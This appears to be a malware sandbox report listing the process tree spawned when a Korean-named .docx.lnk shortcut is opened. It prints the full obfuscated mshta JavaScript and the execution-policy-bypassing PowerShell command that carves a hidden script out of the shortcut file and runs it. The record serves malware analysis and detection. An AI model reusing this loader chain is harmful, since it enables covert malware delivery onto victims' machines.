ZeroBOX

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "GwFYNFDkeig" C:\Users\test22\AppData\Local\Temp\수정본_20240729.docx.lnk

    3036
    • mshta.exe "C:\Windows\System32\mshta.exe" javascript:q=";)(esolc;)0,0,c(nuR.a;)'llehS.tpircSW'(tcejbOXev"+"itcA wen=a";w=q.split('').reverse().join('');b="-Object";d="$m=Get-C"+"hildItem ";e="*.lnk | where"+b+"{$_.length -eq $t}";f="select";g=" -Encoding Byte;";c="p"+"ower"+"shell -ep by"+"pass -c $o=0x1528;$t=0x2f0f;"+d+e+" | "+f+b+" -Expa"+"ndProperty Name;if($m.count -eq 0){"+d+"$env:T"+"EMP\\*\\"+e+";};$f=gc $m"+g+"$w='c:\\pro"+"gramdata\\p.ps1';sc $w ([byte[]]($f | "+f+" -Skip 0x0f22 | "+f+" -SkipLast ($t-0x1528)))"+g+". $w";eval(w);

      2188
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $o=0x1528;$t=0x2f0f;$m=Get-ChildItem *.lnk | where-Object{$_.length -eq $t} | select-Object -ExpandProperty Name;if($m.count -eq 0){$m=Get-ChildItem $env:TEMP\*\*.lnk | where-Object{$_.length -eq $t};};$f=gc $m -Encoding Byte;$w='c:\programdata\p.ps1';sc $w ([byte[]]($f | select -Skip 0x0f22 | select -SkipLast ($t-0x1528))) -Encoding Byte;. $w

        2360
